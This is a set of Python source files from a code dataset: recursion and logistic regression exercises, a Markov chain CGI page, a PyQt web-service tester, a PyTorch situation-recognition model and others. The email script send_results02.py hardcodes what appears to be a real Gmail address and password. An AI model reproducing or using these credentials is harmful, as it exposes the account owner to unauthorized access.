elements are present\r\n if arr[low]>arr[high]:\r\n arr_min = arr[high]\r\n arr_max = arr[low]\r\n else:\r\n arr_min = arr[low]\r\n arr_max = arr[high]\r\n return (arr_min,arr_max)\r\n\r\n else: #more than 2 elements\r\n mid = int((low+high)/2)\r\n arr_min1,arr_max1 = getminmax(low,mid,arr)\r\n arr_min2,arr_max2 = getminmax(mid+1,high,arr)\r\n return (min(arr_min1,arr_min2),max(arr_max1,arr_max2))\r\n\r\narr = [12,34,54,28,62]\r\nprint (getminmax(0,len(arr)-1,arr))\r\n\r\n","sub_path":"Data_structures/Min-max_array.py","file_name":"Min-max_array.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403712829","text":"\"\"\"\n If you want\n\"\"\"\n\nfrom collections import namedtuple\n\nfrom transfert.url import Url\nfrom transfert.resources._resource import _Resource\n\nfrom pkg_resources import get_distribution, DistributionNotFound\nimport os.path\n\ntry:\n _dist = get_distribution('transfert')\n # Normalize case for Windows systems\n dist_loc = os.path.normcase(_dist.location)\n here = os.path.normcase(__file__)\n if not here.startswith(os.path.join(dist_loc, 'transfert')):\n # not installed, but there is another version that *is*\n raise DistributionNotFound\nexcept DistributionNotFound:\n __version__ = 'Please install this project with setup.py'\nelse:\n __version__ = _dist.version\n\nSizeInfo = namedtuple('SizeInfo', ['current', 'total', 'last_chunk'])\nResource = _Resource.from_url\n","sub_path":"transfert/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575818992","text":"import logging\nimport sys\n\n\nformat = \"%(asctime)-15s %(threadName)s %(module)s %(funcName)s %(lineno)d %(message)s\"\n\nlogging.basicConfig(format=format, stream=sys.stderr, level=logging.DEBUG)\ndb_log = logging.getLogger(__name__)\n\nfor handler in logging.root.handlers:\n handler.addFilter(logging.Filter(__name__))","sub_path":"db_code/log_manager.py","file_name":"log_manager.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31912543","text":"#!/usr/bin/python\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\nprint('HTTP/1.0 200 OK')\nprint('Content-Type: text/html;charset=utf-8')\nprint('encoding: utf-8')\nprint()\n\nform = cgi.FieldStorage()\n\nprint('''\n

Markov Chain Simulator

\n

Use the bottom two rows for absorbing states

\n
\n \n \n \n \n \n
\n
\n \n \n \n \n \n
\n
\n \n \n \n \n \n
\n
\n \n \n \n \n \n
\n
\n \n \n \n \n \n
\n
\n \n
\n''')\n\nimport numpy as np\nimport math\n\ndef mean_number_of_passages(Q, num_transient_states):\n return np.linalg.inv(np.subtract(np.identity(num_transient_states), Q))\n\ndef mean_time_to_absorption(W, num_transient_states):\n return W.dot(np.ones((num_transient_states, 1)))\n\ndef prob_of_absorption(W, R):\n return W.dot(R)\n\nif len(form.keys()) == 25:\n if (float(form['00'].value) + float(form['01'].value) + float(form['02'].value) + float(form['03'].value) + float(form['04'].value) == 1) and (float(form['10'].value) + float(form['11'].value) + float(form['12'].value) + float(form['13'].value) + float(form['14'].value) == 1) and (float(form['20'].value) + float(form['21'].value) + float(form['22'].value) + float(form['23'].value) + float(form['24'].value) == 1) and (float(form['30'].value) + float(form['31'].value) + float(form['32'].value) + float(form['33'].value) + float(form['34'].value) == 1) and (float(form['40'].value) + float(form['41'].value) + float(form['42'].value) + float(form['43'].value) + float(form['44'].value) == 1):\n Q = np.array([[float(form['00'].value), float(form['01'].value), float(form['02'].value)],\n [float(form['10'].value), float(form['11'].value), float(form['12'].value)],\n [float(form['20'].value), float(form['21'].value), float(form['22'].value)]])\n R = np.array([[float(form['03'].value), float(form['04'].value)],\n [float(form['13'].value), float(form['14'].value)],\n [float(form['23'].value), float(form['24'].value)]])\n else:\n print('

Rows do not add up to 1, using default matrix instead.

') \n Q = np.array([[float(0.2970), float(0.3960), float(0.0990)],\n [float(0.1515), float(0.3030), float(0.3030)],\n [float(0.1176), float(0.1176), float(0.1176)]])\n R = np.array([[float(0.1980), float(0.0100)],\n [float(0.2273), float(0.0152)],\n [float(0.5882), float(0.0590)]])\nelse:\n print('

All boxes are not filled in, using default matrix instead.

')\n Q = np.array([[float(0.2970), float(0.3960), float(0.0990)],\n [float(0.1515), float(0.3030), float(0.3030)],\n [float(0.1176), float(0.1176), float(0.1176) ]])\n R = np.array([[float(0.1980), float(0.0100)],\n [float(0.2273), float(0.0152)],\n [float(0.5882), float(0.0590) ]])\n\npartA = mean_number_of_passages(Q, 3)\nprint('

Mean number of passages over transient state j starting at transient state i:

')\nprint('

{}

'.format(partA[0]))\nprint('

{}

'.format(partA[1]))\nprint('

{}

'.format(partA[2]))\npartB = mean_time_to_absorption(partA, 3)\nprint('

Mean time to absorption starting at transient state i:

')\nprint('

{}

'.format(partB[0]))\nprint('

{}

'.format(partB[1]))\nprint('

{}

'.format(partB[2]))\npartC = prob_of_absorption(partA, R)\nprint('

Probability of absorption to absorbing state k:

')\nprint('

{}

'.format(partC[0]))\nprint('

{}

'.format(partC[1]))\nprint('

{}

'.format(partC[2]))\n\n","sub_path":"www/scripts/markov_chain.py","file_name":"markov_chain.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"475470818","text":"# Import Statements\nimport zipfile, os, sys\nimport poplib, getpass, email, smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email import encoders\n\n# Email Account Details\nu = 'fpaabot.dev2@gmail.com'\nup = 'cadsp_fpaa'\n\n# Process Command Line Arguments\nif (len(sys.argv) == 3):\n users_email = str(sys.argv[1])\n file_name = str(sys.argv[2])\n print(users_email)\n print(file_name)\nelse:\n sys.exit(\"user email or results file not provided\")\n\n# Compose email ...\nfromaddr = \"fpaabot.dev@gmail.com\"\ntoaddr = users_email\nmsg = MIMEMultipart()\nmsg['From'] = fromaddr\nmsg['To'] = toaddr\n\ntry:\n f1_watch='WATCHDOG.txt'\n FILE=open(f1_watch,'r')\n if FILE.read()=='1':\n print('I am inside watchdog area')\n msg['Subject'] = \"Run time execution over 3 minutes\"\n body = \"You just put the remote system in a loop!!!It had to reset itself.\\nFor Debugging:\\nIf you are using a long input vector, for now the remote system is constrained to 500 points.\\nCheck if you are using the right chip num(01 and 13) and board num(3.0).\\nIf you are using RAMP ADC its input voltage range is 0.2 to 1.8 Volts.\\nOther things hmm. Maybe check the sampling rate of the DAC and the ADC. Sampling rate is the time between two point. So if Sampling rate is 200 Hz then it will wait for 5ms to measure each point.\"\n else:\n msg['Subject'] = \"Results\"\n body = \".\"\n FILE.close() \nexcept:\n\tmsg['Subject'] = \"Results\"\n\tbody = \".\" \n\t\nmsg.attach(MIMEText(body, 'plain'))\ntry:\n part = MIMEBase('application', \"octet-stream\")\n part.set_payload( open(file_name,\"rb\").read() )\n encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(file_name))\n msg.attach(part)\nexcept:\n print ('Failed to attach zipped file!')\n\n# Send email ...\ns = smtplib.SMTP('smtp.gmail.com', 587)\ns.ehlo()\ns.starttls()\ns.login(u, up)\ns.sendmail(fromaddr, toaddr, msg.as_string())\ns.quit()\n","sub_path":"remote_server/send_results02.py","file_name":"send_results02.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6594028","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\n#from PIL import Image\nfrom scipy import ndimage\nfrom lr_utils import load_dataset\n\n\n#example of a picture\ntrain_set_x_orig,train_set_y,test_set_x_orig,test_set_y,classes = \\\n load_dataset()\n'''index = 25\nplt.figure()\nplt.imshow(train_set_x_orig[index])\nprint(\"y = \" + str(train_set_y[:,index]) + \",it's a \" + \n classes[np.squeeze(train_set_y[:,index])].decode(\"utf-8\") + \"'\\\n picture.\")\nplt.show()\n'''\n\nnum_px = train_set_x_orig.shape[1]\n\n#reshape the training and test examples\ntrain_set_x_flatten = \\\n train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T\ntest_set_x_flatten = \\\n test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T\n''' \nprint(\"train_set_x_flatten shape:\" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape\" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape:\" + str(test_set_x_flatten.shape))\nprint(\"test_set_y shape\" + str(test_set_y.shape))\n'''\n\n#standardize our dataset\ntrain_set_x = train_set_x_flatten / 255\ntest_set_x = test_set_x_flatten / 255\n\ndef sigmoid(z):\n s = 1/(1+np.exp(-z))\n return s\n\ndef initialize_with_zeros(dim):\n '''\n argument:\n dim -- the size of w vector\n returns:\n w -- initialized weight vector with (dim,1)\n b -- initialized bias\n '''\n w = np.zeros((dim,1))\n b = 0\n \n #check the dimentions are correct\n assert(w.shape == (dim,1))\n assert(isinstance(b,float) or isinstance(b,int))\n \n return w,b\n\ndef propagate(w,b,X,Y):\n '''\n w -- weights ,a numpy array of size(num_px * num_px * 3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n Y -- label vector of size (1,number of examples)\n '''\n m = X.shape[1]\n \n #forward propagate\n A = sigmoid(np.dot(w.T,X)+b)\n cost = -(np.dot(Y,np.log(A.T))+np.dot(np.log(1-A),(1-Y).T)) / m\n \n #backward propagate\n dw = np.dot(X,(A-Y).T) / m\n db = np.sum(A-Y) / m\n \n #check these parameters\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n grads = {\"dw\": dw,\n \"db\": db}\n return grads,cost \n \ndef optimize(w,b,X,Y,num_iterations,learning_rate,print_cost = False):\n \"\"\"\n this function optimizes w and b by runing a gradient descent method\n argument:\n w -- weights ,a numpy array of size(num_px * num_px * 3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n Y -- label vector of size (1,number of examples)\n num_iterations -- number of iterations of the optimization loop\n learnig_rate -- funtions is the same as it's name\n print_cost -- True to print cost every 100 iterations\n returns:\n params -- dictionary contains weights w and b\n grads -- dictionary contains dw and db with the respect cost\n costs -- list of all costs every 100 steps\n \"\"\" \n \n costs = []\n \n for i in range(num_iterations):\n #get the grads and cost from propagate\n grads,cost = propagate(w,b,X,Y)\n \n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n #update the params w,b\n w = w - learning_rate * dw\n b = b - learning_rate * db\n \n #every 100 iterations record the cost\n if i % 100 == 0:\n costs.append(cost)\n \n #decide whether to print cost or not\n if print_cost and i % 100 == 0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n \n #package the return value we need \n params = {\"w\": w,\n \"b\": b}\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return params,grads,costs \n\ndef predict(w,b,X):\n '''\n argumenr:\n w -- weights,numpy array of size(num_px * num_px *3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n return:\n Y_prediction -- prediction,a numpy array of size(1,number of examples)\n '''\n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0],1)\n \n A = sigmoid(np.dot(w.T,X) + b)\n \n for i in range(A.shape[1]):\n if A[0][i] <= 0.5:\n A[0][i] = 0\n else:\n A[0][i] = 1\n Y_prediction = A\n \n assert(Y_prediction.shape == (1,m))\n \n return Y_prediction\n \ndef model(X_train,Y_train,X_test,Y_test,num_iterations = 2000,\\\n learning_rate = 0.5,print_cost = True):\n '''\n X_train -- training set,numpy array of size(num_px*num_px*3,m_train)\n Y_train -- training labels,numpy array of size(1,m_train)\n X_test -- test set,numpy array of size(num_px*num_px*3,m_test)\n Y_test -- test labels,numpy array of size(1,m_test)\n num_iterations -- \n learning_rate -- \n print_cost -- \n \n returns:\n d -- dictionary containing information about the model\n '''\n #initialize the parameters\n w,b = initialize_with_zeros(X_train.shape[0])\n \n #run the gradient decent and get the weights and bias\n parameters,grads,costs = optimize(w,b,X_train,Y_train,\\\n num_iterations,learning_rate,print_cost)\n \n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n #make predictions in the training set and test set\n Y_prediction_test = predict(w,b,X_test)\n Y_prediction_train = predict(w,b,X_train)\n \n #visualize the accuracy\n print(\"train accuracy: {}%\".format(100 - \\\n np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {}%\".format(100 - \\\n np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n \n #get the informations in this model \n d = {\"costs\":costs,\n \"Y_prediction_test\":Y_prediction_test,\n \"Y_prediction_train\":Y_prediction_train,\n \"w\":w,\n \"b\":b,\n \"learning_rate\":learning_rate,\n \"num_iterations\":num_iterations}\n \n return d\n\nd = model(train_set_x,train_set_y,test_set_x,test_set_y,\\\n num_iterations = 2000,learning_rate = 0.005,print_cost = True)\n\n#visualize the cost under a fixed learning_rate\n'''\ncosts = np.squeeze(d['costs'])\nplt.plot(costs)\nplt.ylabel('cost')\nplt.xlabel('iterations(per hundreds)')\nplt.title(\"Learning rate =\" + str(d[\"learning_rate\"]))\nplt.show()\n'''\n\nmy_image = \"test.jpg\"\nfname = \"images/\" + my_image\nimage = np.array(ndimage.imread(fname,flatten=False))\nmy_image = scipy.misc.imresize(image,size=(num_px,num_px)).reshape((1,num_px*\n num_px*3)).T\nprint(str(num_px))\nprint(\"my_image shape is:\" + str(my_image.shape))\nmy_predicted_image = predict(d[\"w\"],d[\"b\"],my_image)\n\nplt.figure()\nplt.imshow(image)\nplt.show()\nprint(\"y = \" + str(np.squeeze(my_predicted_image)) + \" , your algorithm\\\n predicts a \\\"\" + \n classes[int(np.squeeze(my_predicted_image))].decode(\"utf-8\") + \"\\\n picture.\")\n","sub_path":"logisitic.py","file_name":"logisitic.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103026416","text":"\nimport itertools\n\n\ndef eachPattern(k):\n patterns = []\n each = itertools.product('ATGC', repeat=k)\n for i in each:\n tmp = ''.join(i)\n patterns.append(tmp)\n return patterns\n\n\ndef difference(pat1, pat2):\n if (pat1 == pat2):\n return 0\n tmp = 0\n i = 0\n for j in pat1:\n if j != pat2[i]:\n tmp += 1\n i += 1\n return tmp\n\n\ndef MotifEnumeration(DNA, k, d):\n patterns = []\n out = []\n count = 0\n for str in DNA:\n for i in range(len(str) - k):\n eachpatterns = eachPattern(k)\n for tmp in eachpatterns:\n diff = difference(str[i:i + k ], tmp)\n if diff <= d:\n count = 0\n for strr in DNA:\n for j in range(len(str) - k + 1):\n if difference(tmp, strr[j:j + k]) <= d:\n count += 1\n break\n if count == len(DNA):\n patterns.append(tmp)\n patterns.sort()\n for x in patterns:\n if (not x in out):\n out.append(x)\n out = ' '.join(out)\n return out\n\n\na = input()\na = a.split()\nDNA = []\n\nk = int(a[0])\nd = int(a[1])\n\nfor i in range(k):\n DNA.append(input())\n\nprint(MotifEnumeration(DNA, k, d))","sub_path":"task 4/4.1 Motif Enumeration Problem.py","file_name":"4.1 Motif Enumeration Problem.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"365620887","text":"import sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtCore import pyqtSlot\r\n\r\n#from root.nested.wst import Wst\r\n\r\nfrom wst import Wst\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\nimport traceback\r\nimport time\r\n\r\n\r\n \r\nclass App(QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.title = 'WEB SERVICES TEST TOOL'\r\n self.left = 50\r\n self.top = 50\r\n self.width = 640\r\n self.height = 400\r\n \r\n #create GUI\r\n self.initUI() \r\n \r\n \r\n def initUI(self):\r\n #window setting\r\n self.setWindowTitle(self.title)\r\n self.setGeometry(self.left, self.top, self.width, self.height)\r\n \r\n #file menu\r\n mainMenu = self.menuBar() \r\n fileMenu = mainMenu.addMenu('File')\r\n editMenu = mainMenu.addMenu('Edit')\r\n viewMenu = mainMenu.addMenu('View')\r\n searchMenu = mainMenu.addMenu('Search')\r\n toolsMenu = mainMenu.addMenu('Tools')\r\n helpMenu = mainMenu.addMenu('Help')\r\n \r\n exitButton = QAction(QIcon('exit24.png'), 'Exit', self)\r\n exitButton.setShortcut('Ctrl+Q')\r\n exitButton.setStatusTip('Exit application')\r\n exitButton.triggered.connect(self.close)\r\n fileMenu.addAction(exitButton)\r\n \r\n browseButton = QAction(QIcon('exit24.png'), 'Browser', self)\r\n browseButton.setShortcut('Ctrl+B')\r\n browseButton.setStatusTip('Open browser')\r\n browseButton.triggered.connect(self.test_browser)\r\n toolsMenu.addAction(browseButton) \r\n \r\n #main window components\r\n centralWidget = MainWindow() \r\n self.setCentralWidget(centralWidget) \r\n \r\n self.statusBar()\r\n \r\n self.show()\r\n \r\n def test_browser(self):\r\n try: \r\n wst = Wst()\r\n wst.popuniKladionicu()\r\n except:\r\n print(\"Unexpected error:\", sys.exc_info()[0]) \r\n \r\n \r\nclass MainWindow(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n \r\n \r\n def initUI(self):\r\n self.createGridLayout()\r\n \r\n windowLayout = QVBoxLayout()\r\n windowLayout.addWidget(self.horizontalGroupBox)\r\n self.setLayout(windowLayout)\r\n \r\n \r\n def createGridLayout(self): \r\n self.horizontalGroupBox = QGroupBox(\"\")\r\n \r\n self.title = QLabel('Title')\r\n self.urlLabel = QLabel('URL')\r\n self.resLabel = QLabel('Response')\r\n self.titleEdit = QLineEdit()\r\n self.urlEdit = QLineEdit()\r\n self.urlEdit.setText(\"http://api.football-data.org/v1/competitions/467/teams\") \r\n self.responseEdit = QTextEdit() \r\n self.getButton = QPushButton(\"GET\") \r\n self.getButton.clicked.connect(self.get_clicked)\r\n self.cancelButton = QPushButton(\"Cancel\") \r\n \r\n \r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n grid.addWidget(self.title, 1, 0)\r\n grid.addWidget(self.titleEdit, 1, 1)\r\n\r\n grid.addWidget(self.urlLabel, 2, 0)\r\n grid.addWidget(self.urlEdit, 2, 1)\r\n\r\n grid.addWidget(self.resLabel, 3, 0)\r\n grid.addWidget(self.responseEdit, 3, 1, 5, 1)\r\n \r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(self.getButton)\r\n hbox.addWidget(self.cancelButton)\r\n \r\n grid.addLayout(hbox, 9, 1) \r\n\r\n self.horizontalGroupBox.setLayout(grid)\r\n \r\n self.show()\r\n \r\n #call and get response from web service \r\n def get_clicked(self):\r\n try: \r\n self.responseEdit.setText(\"\")\r\n wst = Wst()\r\n response = wst.call_ws(self.urlEdit.text())\r\n self.responseEdit.append(response)\r\n except:\r\n print(\"Unexpected error:\", sys.exc_info()[0])\r\n \r\n \r\n \r\n#application entry point \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = App()\r\n sys.exit(app.exec_())","sub_path":"my_project/root/nested/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"197546232","text":"import torch\nimport torch.nn as nn\nfrom attention import Attention, NewAttention\nfrom language_model import WordEmbedding, QuestionEmbedding\nfrom classifier import SimpleClassifier\nfrom fc import FCNet\nimport torch.nn.functional as F\nimport torchvision as tv\nimport utils\nimport numpy as np\n\nclass vgg16_modified(nn.Module):\n def __init__(self):\n super(vgg16_modified, self).__init__()\n vgg = tv.models.vgg16(pretrained=True)\n self.vgg_features = vgg.features\n\n def rep_size(self):\n return 1024\n\n def base_size(self):\n return 512\n\n def forward(self,x):\n #return self.dropout2(self.relu2(self.lin2(self.dropout1(self.relu1(self.lin1(self.vgg_features(x).view(-1, 512*7*7)))))))\n features = self.vgg_features(x)\n\n return features\n\n\nclass TopDown(nn.Module):\n def __init__(self,\n vocab_size,\n embed_hidden=300,\n mlp_hidden=512):\n super(TopDown, self).__init__()\n\n self.vocab_size = vocab_size\n\n self.verb_transform = nn.Linear(embed_hidden, mlp_hidden)\n self.v_att = NewAttention(mlp_hidden, mlp_hidden, mlp_hidden)\n '''self.q_net = FCNet([mlp_hidden, mlp_hidden])\n self.v_net = FCNet([mlp_hidden, mlp_hidden])\n self.classifier = SimpleClassifier(\n mlp_hidden, 2 * mlp_hidden, self.vocab_size, 0.5)'''\n self.classifier = nn.Sequential(\n nn.Linear(mlp_hidden * 7 *7 + mlp_hidden, mlp_hidden*8),\n nn.BatchNorm1d(mlp_hidden*8),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(mlp_hidden * 8, mlp_hidden),\n nn.BatchNorm1d(mlp_hidden),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n )\n\n\n def forward(self, img, q_emb):\n batch_size = img.size(0)\n\n att = self.v_att(img, q_emb)\n v_emb = (att * img)\n v_emb = v_emb.permute(0, 2, 1)\n v_emb = v_emb.contiguous().view(-1, 512*7*7)\n v_emb_with_q = torch.cat([v_emb, q_emb], -1)\n logits = self.classifier(v_emb_with_q)\n\n return logits\n\nclass BaseModel(nn.Module):\n def __init__(self, encoder,\n gpu_mode,\n embed_hidden=300,\n mlp_hidden=512):\n super(BaseModel, self).__init__()\n\n self.normalize = tv.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n\n self.train_transform = tv.transforms.Compose([\n tv.transforms.RandomRotation(10),\n tv.transforms.RandomResizedCrop(224),\n tv.transforms.RandomHorizontalFlip(),\n tv.transforms.ToTensor(),\n self.normalize,\n ])\n\n self.dev_transform = tv.transforms.Compose([\n tv.transforms.Resize(224),\n tv.transforms.CenterCrop(224),\n tv.transforms.ToTensor(),\n self.normalize,\n ])\n\n self.encoder = encoder\n self.gpu_mode = gpu_mode\n self.n_roles = self.encoder.get_num_roles()\n self.n_verbs = self.encoder.get_num_verbs()\n self.vocab_size = self.encoder.get_num_labels()\n self.max_role_count = self.encoder.get_max_role_count()\n self.n_role_q_vocab = len(self.encoder.question_words)\n self.det_obj_label_count = self.encoder.total_det_objcount\n\n self.conv = vgg16_modified()\n self.verb_lookup = nn.Embedding(self.n_verbs, embed_hidden)\n self.w_emb = nn.Embedding(self.n_role_q_vocab + 1, embed_hidden, padding_idx=self.n_role_q_vocab)\n self.q_emb1 = nn.LSTM(embed_hidden, mlp_hidden,\n batch_first=True, bidirectional=True)\n self.lstm_proj1 = nn.Linear(mlp_hidden * 2, mlp_hidden)\n self.q_emb2 = nn.LSTM(mlp_hidden, mlp_hidden,\n batch_first=True, bidirectional=True)\n self.lstm_proj2 = nn.Linear(mlp_hidden * 2, mlp_hidden)\n self.roles = TopDown(self.vocab_size)\n self.last_class = nn.Linear(mlp_hidden, self.vocab_size)\n\n self.conv_hidden = self.conv.base_size()\n self.mlp_hidden = mlp_hidden\n self.embed_hidden = embed_hidden\n self.dropout = nn.Dropout(0.3)\n self.num_steps = 2\n\n def train_preprocess(self):\n return self.train_transform\n\n def dev_preprocess(self):\n return self.dev_transform\n\n def forward(self, img_id, img, verb):\n\n img_features = self.conv(img)\n batch_size, n_channel, conv_h, conv_w = img_features.size()\n img = img_features.view(batch_size, n_channel, -1)\n img = img.permute(0, 2, 1)\n\n img_updated = img\n\n img_updated = img_updated.expand(self.max_role_count,img_updated.size(0), img_updated.size(1), img_updated.size(2))\n img_updated = img_updated.transpose(0,1)\n img_updated = img_updated.contiguous().view(batch_size* self.max_role_count, -1, self.mlp_hidden)\n verb_embd = self.verb_lookup(verb)\n verb_embed_expand = verb_embd.expand(self.max_role_count, verb_embd.size(0), verb_embd.size(1))\n verb_embed_expand = verb_embed_expand.transpose(0,1)\n verb_embed_expand = verb_embed_expand.contiguous().view(-1, self.embed_hidden)\n\n role_qs, _ = self.encoder.get_role_questions_batch(verb)\n if self.gpu_mode >= 0:\n role_qs = role_qs.to(torch.device('cuda'))\n\n\n role_qs = role_qs.view(batch_size*self.max_role_count, -1)\n embed_qs = torch.cat([ self.w_emb(role_qs),verb_embed_expand.unsqueeze(1)],1)\n self.q_emb1.flatten_parameters()\n lstm_out, (h, _) = self.q_emb1(embed_qs)\n q_emb = h.permute(1, 0, 2).contiguous().view(batch_size*self.max_role_count, -1)\n q_emb = self.lstm_proj1(q_emb)\n\n rep = self.roles(img_updated, q_emb)\n\n for i in range(self.num_steps):\n\n labelrep = rep.contiguous().view(batch_size, -1, self.mlp_hidden)\n labelrep_expand = labelrep.expand(self.max_role_count, labelrep.size(0), labelrep.size(1), labelrep.size(2))\n labelrep_expand = labelrep_expand.transpose(0,1)\n labelrep_expand_new = torch.zeros([batch_size, self.max_role_count, self.max_role_count-1, self.mlp_hidden])\n for i in range(self.max_role_count):\n if i == 0:\n labelrep_expand_new[:,i] = labelrep_expand[:,i,1:]\n elif i == self.max_role_count -1:\n labelrep_expand_new[:,i] = labelrep_expand[:,i,:i]\n else:\n labelrep_expand_new[:,i] = torch.cat([labelrep_expand[:,i,:i], labelrep_expand[:,i,i+1:]], 1)\n\n if self.gpu_mode >= 0:\n labelrep_expand_new = labelrep_expand_new.to(torch.device('cuda'))\n\n labelrep_expand = labelrep_expand_new.contiguous().view(-1, self.max_role_count-1, self.mlp_hidden)\n\n updated_roleq = torch.cat([labelrep_expand, q_emb.unsqueeze(1)], 1)\n self.q_emb2.flatten_parameters()\n lstm_out, (h, _) = self.q_emb2(updated_roleq)\n q_emb_up = h.permute(1, 0, 2).contiguous().view(batch_size*self.max_role_count, -1)\n q_emb_up = self.lstm_proj2(q_emb_up)\n\n rep2 = self.roles(img_updated, q_emb_up)\n\n rep = rep + self.dropout(rep2)\n #rep = self.rep_proj(torch.cat([rep2, rep], -1))\n\n role_label_pred = self.last_class(rep)\n role_label_pred = role_label_pred.contiguous().view(batch_size, -1, self.vocab_size)\n\n\n return role_label_pred\n\n def calculate_loss(self, gt_verbs, role_label_pred, gt_labels,args):\n\n batch_size = role_label_pred.size()[0]\n if args.train_all:\n loss = 0\n for i in range(batch_size):\n for index in range(gt_labels.size()[1]):\n frame_loss = 0\n #verb_loss = utils.cross_entropy_loss(verb_pred[i], gt_verbs[i])\n #frame_loss = criterion(role_label_pred[i], gt_labels[i,index])\n for j in range(0, self.max_role_count):\n frame_loss += utils.cross_entropy_loss(role_label_pred[i][j], gt_labels[i,index,j] ,self.vocab_size)\n frame_loss = frame_loss/len(self.encoder.verb2_role_dict[self.encoder.verb_list[gt_verbs[i]]])\n #print('frame loss', frame_loss, 'verb loss', verb_loss)\n loss += frame_loss\n else:\n #verb from pre-trained\n loss = 0\n for i in range(batch_size):\n for index in range(gt_labels.size()[1]):\n frame_loss = 0\n #verb_loss = utils.cross_entropy_loss(verb_pred[i], gt_verbs[i])\n #frame_loss = criterion(role_label_pred[i], gt_labels[i,index])\n for j in range(0, self.max_role_count):\n frame_loss += utils.cross_entropy_loss(role_label_pred[i][j], gt_labels[i,index,j] ,self.vocab_size)\n frame_loss = frame_loss/len(self.encoder.verb2_role_dict[self.encoder.verb_list[gt_verbs[i]]])\n #print('frame loss', frame_loss, 'verb loss', verb_loss)\n loss += frame_loss\n\n\n final_loss = loss/batch_size\n #print('loss :', final_loss)\n return final_loss","sub_path":"model_roles_recqa_later.py","file_name":"model_roles_recqa_later.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"496287644","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef raw(x: float, **kwargs):\n \"\"\"\n Dummy function to return raw values or 'as is'.\n :param x:\n :return:\n \"\"\"\n y = x\n return y\n\n\ndef norm(x: float, objective: str, max: float, min: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param max:\n :param min:\n :param kwargs:\n :return:\n \"\"\"\n if objective == 'maximize':\n y = (x - min) / (max - min)\n\n elif objective == 'minimize':\n y = (x - max) / (min - max)\n\n else:\n print(\"Normalization objective must be either \\'minimize\\' or \\'maximize\\'\")\n raise\n\n return y\n\n\ndef lin_thresh(x: float, objective: str, lower: float, upper: float, buffer: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param lower:\n :param upper:\n :param buffer:\n :param kwargs:\n :return:\n \"\"\"\n if objective == 'maximize':\n if x >= upper:\n y = 1.0\n elif x <= upper-buffer:\n y = 0.0\n else:\n y = (x - (upper-buffer)) / (upper - (upper-buffer))\n\n elif objective == 'minimize':\n if x <= lower:\n y = 1.0\n elif x >= lower+buffer:\n y = 0.0\n else:\n y = (x - (lower+buffer)) / (lower - (lower+buffer))\n\n elif objective == 'range':\n if lower <= x <= upper:\n y = 1.0\n else:\n if x <= lower-buffer:\n y = 0.0\n elif lower-buffer < x < lower:\n y = (x - (lower-buffer)) / (lower - (lower-buffer))\n elif x >= upper+buffer:\n y = 0.0\n else:\n y = (x - (upper+buffer)) / (upper - (upper+buffer))\n\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef step(x: float, objective: str, lower: float, upper: float, **kwargs):\n if objective == 'maximize':\n if x >= upper:\n y = 1.0\n else:\n y = 